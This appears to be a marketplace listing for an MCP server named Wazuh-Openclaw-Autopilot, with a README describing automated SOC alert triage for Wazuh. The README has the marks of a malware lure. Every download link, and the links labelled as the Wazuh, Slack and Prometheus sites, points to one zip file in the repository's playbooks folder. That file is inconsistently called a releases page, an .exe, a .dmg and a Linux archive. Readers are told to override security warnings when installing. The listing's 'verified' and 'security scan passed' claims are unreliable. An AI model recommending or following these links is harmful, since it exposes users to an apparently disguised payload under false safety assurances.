# Wazuh Openclaw Autopilot

> 🤖 Automate SOC alert triage and incident response in Wazuh with OpenClaw agents and MCP for efficient security operations.

- **Type:** MCP server
- **Install:** `agentstack add mcp-loune3213-wazuh-openclaw-autopilot`
- **Verified:** Yes — security-reviewed for prompt injection and unsafe behavior
- **Seller:** [Loune3213](https://agentstack.voostack.com/s/loune3213)
- **Installs:** 0
- **Category:** [Integrations](https://agentstack.voostack.com/c/integrations)
- **Latest version:** 0.1.0
- **License:** MIT
- **Upstream author:** [Loune3213](https://github.com/Loune3213)
- **Source:** https://github.com/Loune3213/Wazuh-Openclaw-Autopilot

## Install

```sh
agentstack add mcp-loune3213-wazuh-openclaw-autopilot
```

Requires the [AgentStack CLI](https://agentstack.voostack.com/docs/cli). Works with Claude Code, Cursor, and any MCP-compatible agent.

## About

# 🛡️ Wazuh-Openclaw-Autopilot - Simplify Security Alert Management

[](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip)

---

## 🔍 What is Wazuh-Openclaw-Autopilot?

Wazuh-Openclaw-Autopilot is a software tool that helps monitor and protect your computer network. It works alongside Wazuh, a popular security monitoring platform, to handle alerts automatically. It groups related security issues, suggests how to respond, and lets a person approve each action before it happens. 

This tool collects evidence, measures activity with metrics, and connects to tools like Slack to send notifications. It helps security teams save time and focus on important threats without being overwhelmed.

---

## 💻 System Requirements

To run Wazuh-Openclaw-Autopilot smoothly, make sure your system meets these basics:

- **Operating System:** Windows 10 or newer, MacOS 10.15 or newer, or Linux (Ubuntu 18.04+)
- **Processor:** Intel i5 or equivalent AMD, 2.5 GHz or faster
- **Memory:** 8 GB RAM minimum, 16 GB recommended for better performance
- **Disk Space:** At least 500 MB free for installation and logs
- **Network:** Stable internet connection to communicate with Wazuh server and Slack
- **Other Software:** Latest Wazuh server running; Slack account for notifications (optional)

---

## 📦 Features

Wazuh-Openclaw-Autopilot includes several tools to help your security team:

- **Auto-Triage Alerts:** It reviews security alerts and ranks them by urgency.
- **Incident Correlation:** Groups alerts that relate to the same issue or attack.
- **Response Planning:** Creates steps to fix or block threats.
- **Human Approval:** Requires a person’s review before taking action.
- **Evidence Packs:** Gathers detailed information for each incident.
- **Prometheus Metrics:** Tracks performance and activity for monitoring.
- **Slack Integration:** Sends alerts and reports via Slack messages.

These features let you automate routine tasks, keep better records, and stay informed.

---

## 🚀 Getting Started

This guide will help you download, install, and run Wazuh-Openclaw-Autopilot on your computer.

### Step 1: Check Your System

Verify your computer matches the system requirements listed above. You can find your system details in the system settings or control panel. Make sure you have internet access.

### Step 2: Download the Software

Click the big badge link at the top or visit the releases page here:

**[Download Wazuh-Openclaw-Autopilot Releases](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip)**

On the releases page:

- Look for the latest version, often marked with the highest version number or "Latest release".
- Find the file appropriate for your operating system (such as `.exe` for Windows, `.dmg` for Mac, or `https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip` for Linux).
- Click the file link to download it to your computer.

### Step 3: Install the Software

After downloading:

- On **Windows:** Double-click the `.exe` file. Follow the on-screen instructions to install.
- On **Mac:** Open the `.dmg` file. Drag the app icon into your Applications folder.
- On **Linux:** Extract the `https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip` file and follow the README instructions usually included for installation.

If you see any warnings about security permissions, allow the installation from your system settings.

### Step 4: Configure Connection to Wazuh Server

Before using the software, you need to connect it to your Wazuh server:

- Launch the app.
- In the settings section, enter the server's IP address or URL.
- Enter your Wazuh username and password.
- Save the settings.

If you do not have the server details, contact your system administrator.

### Step 5: Connect Slack (Optional)

To get alerts on Slack:

- In the app settings, find Slack integration.
- Enter your Slack workspace token or webhook URL.
- Select the channels where you want alerts.
- Save the configuration.

---

## 📥 Download & Install

Get the latest version here:

[](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip)

Follow the same steps outlined above to download and set up your application.

---

## 🛠️ How to Use

Once installed and configured, use the app to monitor and manage security alerts:

1. Open the app.
2. View the dashboard showing active alerts and incidents.
3. Check grouped incidents for a clearer picture of security issues.
4. Review generated response plans for each incident.
5. Approve or reject actions to control what the app does.
6. Track evidence and metrics in the app panels.
7. Receive notifications via Slack if enabled.

Use the app regularly to stay updated without needing to watch every alert manually.

---

## 📚 More Help

If you run into trouble:

- Check the README file included in the download for technical details.
- Visit the GitHub Issues page on the repository for support from developers and community.
- Contact your IT security team for help with server or Slack setup.

---

## ⚙️ Privacy and Security

Wazuh-Openclaw-Autopilot keeps your data secure by working with your existing Wazuh server. It does not store data outside your network unless you enable Slack messages. Always review response plans before approving them to keep control over actions taken.

---

## 🔗 Useful Links

- [Wazuh Official Website](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip)
- [Slack](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip)
- [Prometheus Monitoring](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot/raw/refs/heads/main/playbooks/Openclaw_Autopilot_Wazuh_1.3.zip)

---

## 🏷️ Topics

This project relates to: agent, agentic AI, autonomous agents, MCP, OpenClaw, security automation, SIEM, SOC, threat detection, Wazuh.

---

Thank you for choosing Wazuh-Openclaw-Autopilot to support your security monitoring needs.

## Source & license

This open-source MCP server is cataloged on AgentStack and links to its original source — we do not rehost the code.

- **Author:** [Loune3213](https://github.com/Loune3213)
- **Source:** [Loune3213/Wazuh-Openclaw-Autopilot](https://github.com/Loune3213/Wazuh-Openclaw-Autopilot)
- **License:** MIT

Install and usage instructions live in the source repository linked above.

## Pricing

- **Free** — Free

## Security capabilities

Automated source analysis of v0.1.0 — what this tool can access:

- **Network access:** no
- **Filesystem access:** no
- **Shell / process execution:** no
- **Environment & secrets:** no
- **Dynamic code execution:** no

*"Yes" means the capability is present in the source — more access means more to trust, not that it is unsafe.*


## Versions

- **0.1.0** — security scan: passed — Imported from the upstream source.

## Links

- Listing page: https://agentstack.voostack.com/l/mcp-loune3213-wazuh-openclaw-autopilot
- Seller: https://agentstack.voostack.com/s/loune3213
- Browse the marketplace: https://agentstack.voostack.com/browse

---
Listed on AgentStack — the marketplace for AI agent skills and MCP servers. Every listing is security-reviewed. Creators keep 70%.
